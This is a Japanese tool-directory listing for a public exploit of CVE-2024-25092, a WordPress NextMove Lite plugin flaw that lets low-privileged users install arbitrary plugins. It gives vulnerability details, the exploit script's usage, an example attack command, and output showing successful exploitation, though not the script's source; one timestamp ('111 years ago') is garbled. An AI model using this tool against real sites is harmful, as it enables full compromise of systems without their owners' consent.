Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-25092 — WordPress NextMove Liteプラグイン <= 2.17.0 - Subscriber+ 任意のプラグインインストール/有効化の脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-25092
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-25092

CVE-2024-25092

WordPress NextMove Liteプラグイン <= 2.17.0 - Subscriber+ 任意のプラグインインストール/有効化の脆弱性

リポジトリを見る
111年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-25092 エクスプロイト

概要

CVE-2024-25092 は、WordPress NextMove Lite プラグイン (バージョン <= 2.17.0) に影響を与える高重大度の脆弱性です。この脆弱性により、認可チェックの欠如により、Subscriber以上のユーザーがWordPressサイト上で任意のプラグインをインストールおよび有効化できるようになります。

詳細

  • 公開日: 2024-06-09
  • 更新日: 2024-06-09
  • 重大度: 高 (CVSSスコア: 8.8)
  • CWE: CWE-862 - 認可の欠落
  • 影響を受けるバージョン: n/a から 2.17.0 までの全バージョン

CVSSベクター

  • CVSSバージョン: 3.1
  • ベクター文字列: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

説明

WordPress用のXLPlugins NextMove Liteプラグインには認可の欠落があり、Subscriberレベルの権限以上を持つ認証済みユーザーが任意のプラグインのインストールと有効化を実行できます。これにより、WordPressサイトが完全に侵害される可能性があります。

エクスプロイトスクリプト

提供されるPythonスクリプトは、WordPressサイトにログインし、指定されたプラグインをインストールすることで、この脆弱性の悪用を自動化します。

使用方法

usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]

Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.

options:
  -h, --help            このヘルプメッセージを表示して終了
  -u URL, --url URL     ターゲットURL
  -un USERNAME, --username USERNAME
                        ユーザー名
  -p PASSWORD, --password PASSWORD
                        パスワード
  -pl PLUGIN, --plugin PLUGIN
                        インストールするプラグイン (デフォルト: cart-for-woocommerce)

例

python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin

出力

Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.

スクリプト詳細

必要条件

  • Python 3.x
  • requests ライブラリ

インストール

  1. リポジトリをクローンします:

    git clone https://github.com/Nxploited/CVE-2024-25092.git
    cd CVE-2024-25092
    
  2. 必要なPythonパッケージをインストールします:

    pip install requests
    

免責事項

このスクリプトは教育目的のみを意図しています。責任を持って、明示的な許可を得たシステムでのみ使用してください。無断使用は違法であり、非倫理的です。

ツールをダウンロード